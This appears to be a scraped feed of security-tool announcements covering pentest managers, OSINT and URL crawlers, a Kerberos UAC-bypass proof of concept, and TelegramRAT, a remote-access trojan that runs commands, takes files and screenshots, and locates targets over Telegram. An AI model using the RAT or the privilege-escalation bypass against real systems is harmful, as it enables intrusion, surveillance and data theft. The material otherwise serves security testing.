The Server panel will display all added servers and basic information about each server, such as: owned users, open ports and whether it has been pwned.


After entering a server, an edit panel will appear. We can add new users found on the server, found vulnerabilities, and attach relevant files.


The Users panel contains all found users from all servers. The users are categorized by permission level and type. Those details can be changed by hovering over the username.


    Files panel will display all the files from the current pentest. A team member can upload and download those files.


    Attack vector panel will display all found attack vectors with Severity/Plausibility/Risk graphs.


    PreReport panel will contain all the screenshots from the current pentest.


    Graph panel will contain all of the Users and Servers and the relationship between them.


    APIs allow users to effortlessly retrieve data by making simple API requests.


    curl redeye.local:8443/api/servers --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
    curl redeye.local:8443/api/users --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
    curl redeye.local:8443/api/exploits --silent -H "Token: redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca" | jq
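
The same data can be fetched from Python; here is a minimal sketch using requests (the host and token are the example values from the curl calls above):

import requests

BASE_URL = "http://redeye.local:8443"
HEADERS = {"Token": "redeye_61a8fc25-105e-4e70-9bc3-58ca75e228ca"}

for endpoint in ("servers", "users", "exploits"):
    # same endpoints as the curl examples above
    response = requests.get(f"{BASE_URL}/api/{endpoint}", headers=HEADERS)
    print(endpoint, response.json())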

    Installation

    Docker

    Pull from GitHub container registry.

    git clone https://github.com/redeye-framework/Redeye.git
    cd Redeye
    docker-compose up -d

    Start/Stop the container

    sudo docker-compose start/stop

    Save/Load Redeye

    docker save ghcr.io/redeye-framework/redeye:latest neo4j:4.4.9 > Redeye.tar
    docker load < Redeye.tar

    GitHub container registry: https://github.com/redeye-framework/Redeye/pkgs/container/redeye

    Source

    git clone https://github.com/redeye-framework/Redeye.git
    cd Redeye
    sudo apt install python3.8-venv
    python3 -m venv RedeyeVirtualEnv
    source RedeyeVirtualEnv/bin/activate
    pip3 install -r requirements.txt
    python3 RedDB/db.py
    python3 redeye.py --safe

    General

    Redeye will listen on: http://0.0.0.0:8443
    Default Credentials:

    • username: redeye
    • password: redeye

    Neo4j will listen on: http://0.0.0.0:7474
    Default Credentials:

    • username: neo4j
    • password: redeye

    Special-Thanks

    • Yoav Danino for mental support and beta testing.

    Credits

    If you own any Code/File in Redeye that is not under MIT License please contact us at: redeye.framework@gmail.com



    InfoHound - An OSINT To Extract A Large Amount Of Data Given A Web Domain Name

    By: Zion3R


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him identify possible ways to get into an organization. InfoHound performs passive analysis techniques (which do not interact directly with the target) using OSINT to extract a large amount of data given a web domain name. This tool will retrieve emails, people, files, subdomains, usernames and urls that will later be analyzed to extract even more valuable information.


    Infohound architecture

    Installation

    git clone https://github.com/xampla/InfoHound.git
    cd InfoHound/infohound
    mv infohound_config.sample.py infohound_config.py
    cd ..
    docker-compose up -d

You must add API keys inside the infohound_config.py file.

    Default modules

InfoHound has 2 different types of modules: those which retrieve data and those which analyse it to extract more relevant information.

Retrieval modules

    Name Description
    Get Whois Info Get relevant information from Whois register.
    Get DNS Records This task queries the DNS.
    Get Subdomains This task uses Alienvault OTX API, CRT.sh, and HackerTarget as data sources to discover cached subdomains.
    Get Subdomains From URLs Once some tasks have been performed, the URLs table will have a lot of entries. This task will check all the URLs to find new subdomains.
    Get URLs It searches all URLs cached by Wayback Machine and saves them into the database. This will later help to discover other data entities like files or subdomains.
    Get Files from URLs It loops through the URLs database table to find files and store them in the Files database table for later analysis. The files that will be retrieved are: doc, docx, ppt, pptx, pps, ppsx, xls, xlsx, odt, ods, odg, odp, sxw, sxc, sxi, pdf, wpd, svg, indd, rdp, ica, zip, rar
    Find Email It looks for emails using queries to Google and Bing.
    Find People from Emails Once some emails have been found, it can be useful to discover the person behind them. Also, it finds usernames from those people.
    Find Emails From URLs Sometimes, the discovered URLs can contain sensitive information. This task retrieves all the emails from URL paths.
    Execute Dorks It will execute the dorks defined in the dorks folder. Remember to group the dorks by categories (filename) to understand their objectives.
    Find Emails From Dorks By default, InfoHound has some dorks defined to discover emails. This task will look for them in the results obtained from dork execution.

    Analysis

    Name Description
    Check Subdomains Take-Over It performs some checks to determine if a subdomain can be taken over.
    Check If Domain Can Be Spoofed It checks if a domain, from the emails InfoHound has discovered, can be spoofed. This could be used by attackers to impersonate a person and send emails as him/her.
    Get Profiles From Usernames This task uses the discovered usernames from each person to find profiles from services or social networks where that username exists. This is performed using the Maigret tool. It is worth noting that although a profile with the same username is found, it does not necessarily mean it belongs to the person being analyzed.
    Download All Files Once files have been stored in the Files database table, this task will download them in the "download_files" folder.
    Get Metadata Using exiftool, this task will extract all the metadata from the downloaded files and save it to the database.
    Get Emails From Metadata As some metadata can contain emails, this task will retrieve all of them and save them to the database.
    Get Emails From Files Content Usually, emails can be included in corporate files, so this task will retrieve all the emails from the downloaded files' content.
    Find Registered Services using Emails It is possible to find services or social networks where an email has been used to create an account. This task will check if an email InfoHound has discovered has an account in Twitter, Adobe, Facebook, Imgur, Mewe, Parler, Rumble, Snapchat, Wordpress, and/or Duolingo.
    Check Breach This task checks Firefox Monitor service to see if an email has been found in a data breach. Although it is a free service, it has a limitation of 10 queries per day. If Leak-Lookup API key is set, it also checks it.

    Custom modules

InfoHound lets you create custom modules; you just need to add your script inside infohound/tool/custom_modules. One custom module has been added as an example, which uses the Holehe tool to check if the previously discovered emails are attached to an account on sites like Twitter, Instagram, Imgur and more than 120 others.

    Inspired by



    Xcrawl3R - A CLI Utility To Recursively Crawl Webpages

    By: Zion3R


xcrawl3r is a command-line interface (CLI) utility to recursively crawl webpages, i.e. systematically browse webpages' URLs and follow links to discover linked webpages' URLs.


    Features

    • Recursively crawls webpages for URLs.
    • Parses URLs from files (.js, .json, .xml, .csv, .txt & .map).
    • Parses URLs from robots.txt.
    • Parses URLs from sitemaps.
    • Renders pages (including Single Page Applications such as Angular and React).
    • Cross-Platform (Windows, Linux & macOS)

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xcrawl3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner:

    curl -sL https://github.com/hueristiq/xcrawl3r/releases/download/v<version>/xcrawl3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xcrawl3r executable.

    ...move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xcrawl3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xcrawl3r/cmd/xcrawl3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xcrawl3r.git 
    • Build the utility

       cd xcrawl3r/cmd/xcrawl3r && \
      go build .
    • Move the xcrawl3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xcrawl3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xcrawl3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xcrawl3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Usage

    To display help message for xcrawl3r use the -h flag:

    xcrawl3r -h

    help message:

                                 _ _____      
    __ _____ _ __ __ ___ _| |___ / _ __
    \ \/ / __| '__/ _` \ \ /\ / / | |_ \| '__|
    > < (__| | | (_| |\ V V /| |___) | |
    /_/\_\___|_| \__,_| \_/\_/ |_|____/|_| v0.1.0

    A CLI utility to recursively crawl webpages.

    USAGE:
    xcrawl3r [OPTIONS]

    INPUT:
    -d, --domain string domain to match URLs
    --include-subdomains bool match subdomains' URLs
    -s, --seeds string seed URLs file (use `-` to get from stdin)
    -u, --url string URL to crawl

    CONFIGURATION:
    --depth int maximum depth to crawl (default 3)
    TIP: set it to `0` for infinite recursion
    --headless bool If true the browser will be displayed while crawling.
    -H, --headers string[] custom header to include in requests
    e.g. -H 'Referer: http://example.com/'
    TIP: use multiple flag to set multiple headers
    --proxy string[] Proxy URL (e.g: http://127.0.0.1:8080)
    TIP: use multiple flag to set multiple proxies
    --render bool utilize a headless chrome instance to render pages
    --timeout int time to wait for request in seconds (default: 10)
    --user-agent string User Agent to use (default: web)
    TIP: use `web` for a random web user-agent,
    `mobile` for a random mobile user-agent,
    or you can set your specific user-agent.

    RATE LIMIT:
    -c, --concurrency int number of concurrent fetchers to use (default 10)
    --delay int delay between each request in seconds
--max-random-delay int maximum extra randomized delay added to `--delay` (default: 1s)
    -p, --parallelism int number of concurrent URLs to process (default: 10)

    OUTPUT:
    --debug bool enable debug mode (default: false)
    -m, --monochrome bool coloring: no colored output mode
    -o, --output string output file to write found URLs
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: debug)
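
Putting the flags together, typical invocations might look like this (URLs and file names are illustrative):

# crawl a single URL two levels deep
xcrawl3r -u https://example.com --depth 2

# crawl from a seeds file, match example.com and its subdomains, save the results
xcrawl3r -d example.com -s seeds.txt --include-subdomains -o urls.txt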

    Contributing

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.

    Credits



    Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

    By: Zion3R


xurlfind3r is a command-line interface (CLI) utility to find a domain's known URLs from curated passive online sources.


    Features

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this one-liner:

    curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

    ...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xurlfind3r.git 
    • Build the utility

       cd xurlfind3r/cmd/xurlfind3r && \
      go build .
    • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xurlfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xurlfind3r will work right after installation. However, BeVigil, GitHub and Intelligence X require API keys to work, and URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, of which one will be used.

    Example config.yaml:

    version: 0.2.0
    sources:
        - bevigil
        - commoncrawl
        - github
        - intelx
        - otx
        - urlscan
        - wayback
    keys:
        bevigil:
            - awA5nvpKU3N8ygkZ
        github:
            - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
            - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
        intelx:
            - 2.intelx.io:00000000-0000-0000-0000-000000000000
        urlscan:
            - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xurlfind3r use the -h flag:

    xurlfind3r -h

    help message:

                     _  __ _           _ _____
    __  ___   _ _ __| |/ _(_)_ __   __| |___ / _ __
    \ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
     >  <| |_| | |  | |  _| | | | | (_| |___) | |
    /_/\_\\__,_|_|  |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

    USAGE:
    xurlfind3r [OPTIONS]

    TARGET:
    -d, --domain string (sub)domain to match URLs

    SCOPE:
    --include-subdomains bool match subdomains' URLs

    SOURCES:
    -s, --sources bool list sources
    -u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
    --skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
    --skip-wayback-source bool with wayback, skip parsing source code snapshots

    FILTER & MATCH:
    -f, --filter string regex to filter URLs
    -m, --match string regex to match URLs

    OUTPUT:
    --no-color bool no color mode
    -o, --output string output URLs file path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

    Examples

    Basic

    xurlfind3r -d hackerone.com --include-subdomains

    Filter Regex

    # filter images
    xurlfind3r -d hackerone.com --include-subdomains -f '^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$'

    Match Regex

    # match js URLs
    xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'
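
    Source Selection

    A further example built only from the flags documented in the help message above (output will vary with your version and configured API keys):

    # list supported sources
    xurlfind3r -s

    # restrict the run to specific sources and skip wayback robots.txt parsing
    xurlfind3r -d hackerone.com --use-sources wayback,github --skip-wayback-robots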

    Contributing

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    KRBUACBypass - UAC Bypass By Abusing Kerberos Tickets

    By: Zion3R


    This POC is inspired by the talk "Taking Kerberos To The Next Level" that James Forshaw (@tiraniddo) gave at Black Hat USA 2022, where he shared a demo of abusing Kerberos tickets to achieve UAC bypass: by adding a KERB-AD-RESTRICTION-ENTRY to the service ticket but filling in a fake MachineID, we can easily bypass UAC and gain SYSTEM privileges by accessing the SCM to create a system service. James Forshaw explained the rationale behind this in a blog post called "Bypassing UAC in the most Complex Way Possible!", which got me very interested. Although he didn't provide the full exploit code, I built a POC based on Rubeus. As a C# toolset for raw Kerberos interaction and ticket abuse, Rubeus provides an easy interface that allows us to initiate Kerberos requests and manipulate Kerberos tickets.

    You can see related articles about KRBUACBypass in my blog "Revisiting a UAC Bypass By Abusing Kerberos Tickets", including the background principle and how it is implemented. As said in the article, this article was inspired by @tiraniddo's "Taking Kerberos To The Next Level" (I would not have done it without his sharing) and I just implemented it as a tool before I graduated from college.


    Tgtdeleg Trick

    We cannot manually generate a TGT, as we do not have access to the current user's credentials. However, Benjamin Delpy (@gentilkiwi) added a trick (tgtdeleg) to his Kekeo toolset that allows you to abuse unconstrained delegation to obtain a local TGT with a session key.

    Tgtdeleg abuses the Kerberos GSS-API to obtain usable TGTs for the current user without requiring elevated privileges on the host. This method uses the AcquireCredentialsHandle function to obtain the Kerberos security credentials handle for the current user, and calls the InitializeSecurityContext function for HOST/DC.domain.com using the ISC_REQ_DELEGATE flag and the target SPN to prepare the pseudo-delegation context to send to the domain controller. This causes the KRB_AP_REQ in the GSS-API output to include the KRB_CRED in the Authenticator Checksum. The service ticket's session key is then extracted from the local Kerberos cache and used to decrypt the KRB_CRED in the Authenticator to obtain a usable TGT. The Rubeus toolset also incorporates this technique. For details, please refer to "Rubeus – Now With More Kekeo".
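
    For reference, the same trick is exposed as a standalone action in Rubeus; a minimal sketch of obtaining a TGT this way (assuming Rubeus.exe is present on the host):

    :: obtain a usable TGT for the current user via the tgtdeleg trick
    Rubeus.exe tgtdeleg /nowrap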

    With this TGT, we can generate our own service ticket, and the feasible operation process is as follows:

    1. Use the Tgtdeleg trick to get the user's TGT.
    2. Use the TGT to request the KDC to generate a new service ticket for the local computer. Add a KERB-AD-RESTRICTION-ENTRY, but fill in a fake MachineID.
    3. Submit the service ticket into the cache.

    Krbscm

    Once you have a service ticket, you can use Kerberos authentication to access the Service Control Manager (SCM) over named pipes or TCP via the HOST/HOSTNAME or RPC/HOSTNAME SPN. Note that the SCM's Win32 API always uses Negotiate authentication. James Forshaw created a simple POC, SCMUACBypass.cpp, which hooks the two APIs AcquireCredentialsHandle and InitializeSecurityContextW and changes the name of the authentication package requested by the SCM (pszPackage) to Kerberos, enabling the SCM to use Kerberos when authenticating locally.

    Let's see it in action

    Now let's take a look at the running effect. First, request a ticket for the HOST service of the current server through the asktgs function, then create a system service through krbscm to gain SYSTEM privileges.

    KRBUACBypass.exe asktgs
    KRBUACBypass.exe krbscm
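
    After asktgs, you can sanity-check that the forged HOST service ticket landed in the cache with the built-in klist utility (a hedged example; the exact output depends on the host):

    :: list cached Kerberos tickets for the current logon session
    klist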




    TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

    By: Zion3R


    Cross-platform Telegram-based RAT that communicates via Telegram to evade network restrictions.


    Installation:

    1. git clone https://github.com/machine1337/TelegramRAT.git
    2. Follow the instructions in the HOW TO USE section.

    HOW TO USE:

    1. Go to Telegram and search for https://t.me/BotFather
    2. Create a bot and get the API_TOKEN
    3. Search for https://t.me/chatIDrobot and get the chat_id
    4. Open client.py and place the API_TOKEN and chat_id on lines 16 and 17
    5. Run python client.py on Windows or python3 client.py on Linux
    6. Go to the bot you created and send commands in the message field

    HELP MENU:

    HELP MENU: Coded By Machine1337
    CMD commands | Execute cmd commands directly in the bot
    cd .. | Move up one directory
    cd foldername | Change to the given folder
    download filename | Download a file from the target
    screenshot | Capture a screenshot
    info | Get system info
    location | Get target location
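
    Putting the menu together, commands are sent to the bot as plain messages; for example (the folder and file names here are hypothetical):

    cd Documents
    download passwords.txt
    screenshot
    info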

    Features:

    1. Execute shell commands in the bot directly.
    2. Download files from the client.
    3. Get client system information.
    4. Get client location information.
    5. Capture screenshots.
    6. More features will be added.

    Author:

    Coded By: Machine1337
    Contact: https://t.me/R0ot1337


    Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

    By: Zion3R


    Easy and customisable pentest report creator based on simple web technologies.

    SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


    Your Benefits

    Write in markdown
    Design in HTML/VueJS
    Render your report to PDF
    Fully customizable
    Self-hosted or Cloud
    No need for Word

    SysReptor Cloud

    You just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground and if you like it, you can get your personal Cloud instance here:

    Sign up here


    SysReptor Self-Hosted

    You prefer self-hosting? That's fine! You will need:

    • Ubuntu
    • Latest Docker (with docker-compose-plugin)
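
    Before running the installer, you can verify both prerequisites from a shell (a quick sanity check, assuming a standard Docker setup):

    docker --version
    docker compose version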

    You can then install SysReptor via an installation script:

    curl -s https://docs.sysreptor.com/install.sh | bash

    After successful installation, access your application at http://localhost:8000/.

    Get detailed installation instructions at Installation.





    ZeusCloud - Open Source Cloud Security

    By: Zion3R


    ZeusCloud is an open source cloud security platform.

    Discover, prioritize, and remediate your risks in the cloud.

    • Build an asset inventory of your AWS accounts.
    • Discover attack paths based on public exposure, IAM, vulnerabilities, and more.
    • Prioritize findings with graphical context.
    • Remediate findings with step by step instructions.
    • Customize security and compliance controls to fit your needs.
    • Meet compliance standards PCI DSS, CIS, SOC 2, and more!

    Quick Start

    1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
    2. Run: cd ZeusCloud && make quick-deploy
    3. Visit http://localhost:80

    Check out our Get Started guide for more details.

    A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

    Sandbox

    Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

    Features

    • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
    • Graphical Context - Understand context behind security findings with graphical visualizations.
    • Access Explorer - Visualize who has access to what with an IAM visualization engine.
    • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
    • Configurability - Configure which security rules are active, which alerts should be muted, and more.
    • Security as Code - Modify rules or write your own with our extensible security as code approach.
    • Remediation - Follow step by step guides to remediate security findings.
    • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

    Why ZeusCloud?

    Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud, both adding new workloads and expanding existing ones. Cloud providers keep increasing their offerings and their complexity. As a result, companies are having trouble keeping track of their security risks as their cloud environments scale and grow more complex. Several high-profile attacks have occurred in recent years: Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, and so on.

    We had to take action.

    • We noticed traditional cloud security tools are opaque, confusing, time-consuming to set up, and expensive as you scale your cloud environment
    • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams, instead inundating them with non-contextual alerts
    • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
    • Best of all, you can use ZeusCloud for free!

    Future Roadmap

    • Integrations with vulnerability scanners
    • Integrations with secret scanners
    • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
    • Support for Azure and GCP environments

    Contributing

    We love contributions of all sizes. What would be most helpful first:

    • Please give us feedback in our Slack.
    • Open a PR (see our instructions below on developing ZeusCloud locally)
    • Submit a feature request or bug report through Github Issues.

    Development

    Run containers in development mode:

    cd frontend && yarn && cd -
    docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

    Reset neo4j and/or postgres data with the following:

    rm -rf .compose/neo4j
    rm -rf .compose/postgres

    To develop on the frontend, make the code changes and save.

    To develop on the backend, run

    docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend
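
    To follow what the rebuilt backend is doing, you can tail its logs (a sketch reusing the compose file and service name from the command above; adjust to your checkout):

    docker-compose -f docker-compose.dev.yaml --env-file .env.dev logs -f backend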

    To access the UI, go to: http://localhost:80.

    Security

    Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

    Open-source vs. cloud-hosted

    This repo is freely available under the Apache 2.0 license.

    We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

    Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!


